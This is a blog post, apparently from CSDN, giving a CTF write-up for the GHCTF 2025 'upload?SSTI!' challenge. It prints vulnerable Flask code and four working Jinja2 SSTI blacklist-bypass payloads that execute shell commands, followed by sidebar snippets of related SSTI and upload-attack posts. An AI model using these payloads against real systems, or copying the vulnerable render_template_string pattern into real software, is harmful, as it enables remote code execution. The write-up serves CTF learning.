[GHCTF 2025]upload?SSTI!

最新推荐文章于 2025-04-30 00:44:17 发布
最新推荐文章于 2025-04-30 00:44:17 发布
阅读量186 收藏 2
点赞数 6
文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86190146/article/details/146300882
版权

 题目源代码

import os
import re

from flask import Flask, request, jsonify,render_template_string,send_from_directory, abort,redirect
from werkzeug.utils import secure_filename
import os
from werkzeug.utils import secure_filename

app = Flask(__name__)

# 配置信息
UPLOAD_FOLDER = 'static/uploads'  # 上传文件保存目录
ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'}
MAX_CONTENT_LENGTH = 16 * 1024 * 1024  # 限制上传大小为 16MB

app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = MAX_CONTENT_LENGTH

# 创建上传目录(如果不存在)
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
def is_safe_path(basedir, path):
    return os.path.commonpath([basedir,path])


def contains_dangerous_keywords(file_path):
    dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]

    with open(file_path, 'rb') as f:
        file_content = str(f.read())


        for keyword in dangerous_keywords:
            if keyword in file_content:
                return True  # 找到危险关键字,返回 True

    return False  # 文件内容中没有危险关键字
def allowed_file(filename):
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


@app.route('/', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        # 检查是否有文件被上传
        if 'file' not in request.files:
            return jsonify({"error": "未上传文件"}), 400

        file = request.files['file']

        # 检查是否选择了文件
        if file.filename == '':
            return jsonify({"error": "请选择文件"}), 400

        # 验证文件名和扩展名
        if file and allowed_file(file.filename):
            # 安全处理文件名
            filename = secure_filename(file.filename)
            # 保存文件
            save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
            file.save(save_path)



            # 返回文件路径(绝对路径)
            return jsonify({
                "message": "File uploaded successfully",
                "path": os.path.abspath(save_path)
            }), 200
        else:
            return jsonify({"error": "文件类型错误"}), 400

    # GET 请求显示上传表单(可选)
    return '''
    <!doctype html>
    <title>Upload File</title>
    <h1>Upload File</h1>
    <form method=post enctype=multipart/form-data>
      <input type=file name=file>
      <input type=submit value=Upload>
    </form>
    '''

@app.route('/file/<path:filename>')
def view_file(filename):
    try:
        # 1. 过滤文件名
        safe_filename = secure_filename(filename)
        if not safe_filename:
            abort(400, description="无效文件名")

        # 2. 构造完整路径
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], safe_filename)

        # 3. 路径安全检查
        if not is_safe_path(app.config['UPLOAD_FOLDER'], file_path):
            abort(403, description="禁止访问的路径")

        # 4. 检查文件是否存在
        if not os.path.isfile(file_path):
            abort(404, description="文件不存在")

        suffix=os.path.splitext(filename)[1]
        print(suffix)
        if suffix==".jpg" or suffix==".png" or suffix==".gif":
            return send_from_directory("static/uploads/",filename,mimetype='image/jpeg')

        if contains_dangerous_keywords(file_path):
            # 删除不安全的文件
            os.remove(file_path)
            return jsonify({"error": "Waf!!!!"}), 400

        with open(file_path, 'rb') as f:
            file_data = f.read().decode('utf-8')
        tmp_str = """<!DOCTYPE html>
        <html lang="zh">
        <head>
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>查看文件内容</title>
        </head>
        <body>
            <h1>文件内容:{name}</h1>  <!-- 显示文件名 -->
            <pre>{data}</pre>  <!-- 显示文件内容 -->

            <footer>
                <p>&copy; 2025 文件查看器</p>
            </footer>
        </body>
        </html>
        """.format(name=safe_filename, data=file_data)

        return render_template_string(tmp_str)

    except Exception as e:
        app.logger.error(f"文件查看失败: {str(e)}")
        abort(500, description="文件查看失败:{} ".format(str(e)))


# 错误处理(可选)
@app.errorhandler(404)
def not_found(error):
    return {"error": error.description}, 404


@app.errorhandler(403)
def forbidden(error):
    return {"error": error.description}, 403


if __name__ == '__main__':
    app.run("0.0.0.0",debug=False)

关键出现 ssti 漏洞处

tmp_str = """<!DOCTYPE html>
        <html lang="zh">
        <head>
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>查看文件内容</title>
        </head>
        <body>
            <h1>文件内容:{name}</h1>  <!-- 显示文件名 -->
            <pre>{data}</pre>  <!-- 显示文件内容 -->

            <footer>
                <p>&copy; 2025 文件查看器</p>
            </footer>
        </body>
        </html>
        """.format(name=safe_filename, data=file_data)

        return render_template_string(tmp_str)

黑名单

 ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]

我先按照一个一个绕过的方法来看的:

过滤 _ 利用编码 \x5f 绕过

过滤关键字用 + 拼接的方式绕过,最后形成的payload:

{{ ()['\x5f\x5fcl'+'ass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsub'+'classes\x5f\x5f']()[117]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['popen']('cat /flag').read() }}

...但是并不行 

方法二:利用 request 绕过

先在文件中写

{{''[request.args.x1][request.args.x2][1][request.args.x3]()[139][request.args.x4][request.args.x5][request.args.x6][request.args.x7](request.args.x8)}}

提交成功了以后再在 file/132.txt 后面加上 ? + 

&x1=__class__&x2=__mro__&x3=__subclasses__&x4=__init__&x5=__globals__&x6=__builtins__&x7=eval&x8=__import__("os").popen("whoami").read()

方法三:set语句拼接

 {%set xhx=({}|select()|string())[24]%}
select 过滤器通常用于条件筛选(类似Python的 filter 函数),但无参数调用时会返回一个生成器对象。
转换为字符串后形如 <generator object select_or_reject at 0x...>
 {%set glo=(xhx,xhx,dict(glo=1,bals=2)|join,xhx,xhx)|join%}
 {%set cla=(xhx,xhx,dict(cla=1,ss=2)|join,xhx,xhx)|join%}
 {%set bas=(xhx,xhx,dict(ba=1,se=2)|join,xhx,xhx)|join%}
 {%set sub=(xhx,xhx,dict(subcla=1,sses=2)|join,xhx,xhx)|join%}
 {%set ini=(xhx,xhx,dict(ini=1,t=2)|join,xhx,xhx)|join%}
 {%set pop="nepop"|reverse%} 啊?
 {%set o=dict(o=1,s=2)|join%}
 {{config[ini][glo][o][pop]("cat /fla*").read()}}

 方法四: Unicode编码绕过

{{lipsum.__globals__.get('os').popen('cat /f*').read()}}

{{lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u0067\u0065\u0074")("\u006f\u0073")|attr("\u0070\u006f\u0070\u0065\u006e")("cat /f*")|attr("\u0072\u0065\u0061\u0064")()}}

ianozo
关注
文件上传 upload-labs 1~20做题记录
小锤队长的博客
05-07 5377
pass-01: 解题思路:(绕开前端js检测) (1):F12 ,直接修改js 允许文件的上传类型 , (2):将webshell 文件后缀名改为允许上传的,然后用 burp suite 拦截后修改 文件后缀名 , (3):利用 浏览器插件 Noscrip 屏蔽js脚本 pass-02: 操作过程: 1,禁用了js 脚本依旧不能上传,猜测可能是 content-type 检测 ...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
GHCTF2025--Web
pwfortune的博客
03-09 2226
替换为空, 使用了bottle库, 查找一些资料, 发现存在ssti模板注入, 本地搭建环境, 把waf去掉, 可以发现使用。前面一直卡在这, 没办法执行一些函数操作啥的, 就没管了, 后面wp出来之后才知道这是Sqlite注⼊ , 怪我见识短浅了。有点奇怪, 我自己本地试了一下这个cookie是可以被反序列化然后执行的, 但是靶机上一直没成功,可能没有权限还是干嘛。可以执行代码, 但是题目是没有回显的, 所以需要反弹shell, 连上自己的vps。php反序列化, 看似代码很多, 其实大都是没有用的。
GHCTF2025-WEB新手向详解-UPLOAD?SSTI! (内含SSTI模板注入关键字绕过方式)
yeyushengfano的博客
03-13 1349
GHCTF2025-WEB新手向详解-UPLOAD?SSTI!
CTF ssti零基础(一) 模块注入的payload
2301_81040377的博客
07-24 681
这里先推荐一个还不错的工具命令还是挺多的有点像sqlmap但是这个暴力多了不用加那么多的参数支持的模板引擎但是利用工具梭哈是没有灵魂的,我的ssti也比较烂所以现在开始学先起一个flask环境写个文件app.py成功,那么继续。
vnctf2025--学生姓名登记系统
2301_80793533的博客
02-13 463
156是因为需要找到python的内置系统函数,方便进行命令执行,这个156是需要进行爆破的,我爆破的时候靶机很容易宕机,我就用的官方payload,总之思路是这样子的。paython的单文件框架,去网上查很容易就能知道是bottle框架,bottle的框架用的是simpletemplate的模板引擎。这里显示存在waf,应该是有长度限制,那么可以尝试海象表达式,因为这个题目是可以多行解析的,可以用%0a代替换行符。知道了是什么引擎的话下一步就是需要知道这个模板引擎的语法,这些地方都是可以上网查询到的。
GHCTF 2025 web 萌新初探wp
Python1111111的博客
03-10 1497
GHCTF WP
GHCTF 2024 新生赛 PermissionDenied
hddi1的博客
01-07 1133
上传。
uploadssti
03-03
### 文件上传与SSTI服务器端模板注入 #### 文件上传的安全风险 文件上传功能如果实现不当,可能会引入多种安全风险。攻击者可能利用此功能上传恶意脚本或可执行文件到服务器上,并尝试访问这些文件以执行任意代码...
upload ssti赛题
03-03
### SSTI漏洞利用赛题示例 服务器端模板注入(Server-Side Template Injection, SSTI)是一种允许攻击者通过操纵输入来执行任意代码的漏洞。这种类型的漏洞通常发生在Web应用程序使用用户输入作为模板的一部分时。 ...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
如何搭建spark yarn模式的集群
a1237564537的博客
04-28 758
spark-env.sh:在/opt/spark-3.3.2-bin-hadoop3.3/conf目录下复制spark-env.sh.template文件并重命名为spark-env.sh,编辑该文件,添加以下内容:​。yarn-site.xml:在/opt/hadoop-3.3.4/etc/hadoop目录下编辑yarn-site.xml文件,添加以下内容:​。配置 Hadoop 环境变量:在所有节点上编辑/etc/profile文件,添加以下内容:​。
相关进程名对应的启动命令及其作用
2402_83590031的博客
04-29 416
在Spark Standalone模式下,通过执行 `$SPARK_HOME/sbin/start - worker.sh spark://<master - host>:<master - port>` 命令启动,或者在启动整个集群时使用 `$SPARK_HOME/sbin/start - all.sh` 也会启动该进程。是Spark Standalone集群中的工作节点进程。在Spark中,使用 `$SPARK_HOME/sbin/start - history - server.sh` 命令启动。
第33周JavaSpringCloud微服务 分布式综合应用
Sweeping_Robot的博客
04-28 950
分布式事务:在大型项目中普遍存在,是面试中的重要考点。能够全面考虑分布式事务的复杂情况,可以体现候选人的综合技术实力。本课程将详细介绍分布式事务的原理,并通过实操将项目从原本不支持分布式事务升级为支持分布式事务。原理:分布式事务是指在分布式系统中,为了保证多个操作要么全部成功要么全部失败而采用的一种机制。其核心目标是保证数据的一致性和完整性。难点:涉及多个服务或数据库,处理复杂,需要全面考虑各种情况,如网络延迟、服务故障等。
Oracle 19c 使用OGG同步数据到kafka端报错分析处理
最新发布
听雪楼主
04-30 379
通过排查参数配置,源端已配置目录名,至此怀疑是目录名配置错误,通过和客户确认,源端环境为多租户数据库,租户数据库名为:Uat。查看源端、目标端同步进程都是running状态。*.*不能是通配符,因为没有为目标表*指定目录名或非通配符目录名。今天收到一个客户反馈,新创建的ogg同步出现了问题,进程启动后无法进行同步。联系业务在源端进行数据库插入操作,目标端(kafka端)已成功获取同步数据。修改完后,启动源、目标端进程,可以正常启动,日志无报错信息。至此,整改故障分析处理结束。报错提示源端没有目录名。
抖音小店代运营公司-品融电商:助力品牌全域增长的领航者
pinkroon的博客
04-28 390
品融电商(PINKROON®)作为中国领先的品牌化电商服务商,凭借其独创的「效品合一 全域增长」方法论,为品牌提供一站式抖音小店代运营服务,助力企业实现从流量获取到销售转化的全链路增长。在兴趣电商与货架电商融合的趋势下,品融电商以“策略+创意+数据”的三重引擎,为品牌提供兼具专业性与实效性的代运营服务。品融电商提出“所有产业带和细分品类都值得重做一遍”的愿景,未来将持续深耕抖音生态,通过AI技术赋能内容生产、私域流量精细化运营,助力更多品牌打破内卷,实现长效增长。
大数据应用开发和项目实战
2401_89806604的博客
04-28 1024
Matplotlib 是 Python 的绘图库,它能让使用者很轻松地将数据图形化,并且提供多样化的输出格式。Matplotlib 可以用来绘制各种静态,动态,交互式的图表。比如说散点图、柱状图等等。
ssti
03-09
### SSTI 服务器端模板注入漏洞防护方法 #### 一、输入验证与过滤 为了防止恶意用户通过不可信的数据源传递特殊字符或者代码片段,在接收任何来自用户的输入之前,应该严格地对其进行验证和清理。这不仅限于表单提交的内容,还包括URL参数、HTTP头部以及其他可能被篡改的信息[^1]。 对于FreeMarker这样的模板引擎而言,可以通过配置来禁用某些危险功能,比如表达式求值等特性;也可以自定义解析器以移除潜在有害指令前缀或关键字[^2]。 ```java Configuration cfg = new Configuration(Configuration.VERSION_2_3_30); cfg.setStrictSyntaxMode(true); // 启用严格的语法模式减少误触发风险 // 设置沙盒策略限制可用内置函数集 TemplateHashModel staticModels = ...; StaticModels.put("unsafe", null, staticModels); ``` #### 二、最小权限原则 应用程序应当遵循最低特权运行的原则,即服务进程仅拥有完成其职责所需的最少资源访问权。即使发生突破隔离机制的情况,也能最大限度降低损失范围。例如Web应用通常不需要root/administrator级别的控制权去读写文件系统之外的地方[^3]。 另外值得注意的是要定期审查并更新依赖库版本,及时修补已知的安全缺陷,因为第三方组件也可能成为引入SSTI问题的原因之一。 #### 三、采用安全框架 现代开发平台往往提供了专门用于防范此类攻击的安全措施,如Spring Security可以很好地集成到Java项目当中提供全面保护方案。它能够帮助开发者轻松实现身份认证、授权管理等功能的同时也包含了抵御多种常见威胁的能力,其中包括但不限于XSS、CSRF以及今天的主题——SSTI。 当涉及到渲染动态HTML页面时,优先考虑使用经过良好测试且具有强大社区支持的视图层技术栈,像Thymeleaf就以其安全性著称,内部实现了自动转义输出从而天然免疫于此类隐患。 #### 四、日志监控预警 建立健全的日志记录体系有助于快速定位异常行为的发生位置及其影响程度。通过对请求流量特征分析(特别是那些试图绕过正常业务逻辑路径的操作),配合IDS/IPS设备实时拦截可疑连接尝试,可以在很大程度上提高系统的整体防御水平。 最后提醒一点,虽然上述手段能在不同程度上缓解SSTI带来的危害,但没有任何一种单独的方法能百分之百杜绝所有可能性。因此建议采取多层次综合防控思路构建稳固可靠的网络边界屏障。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值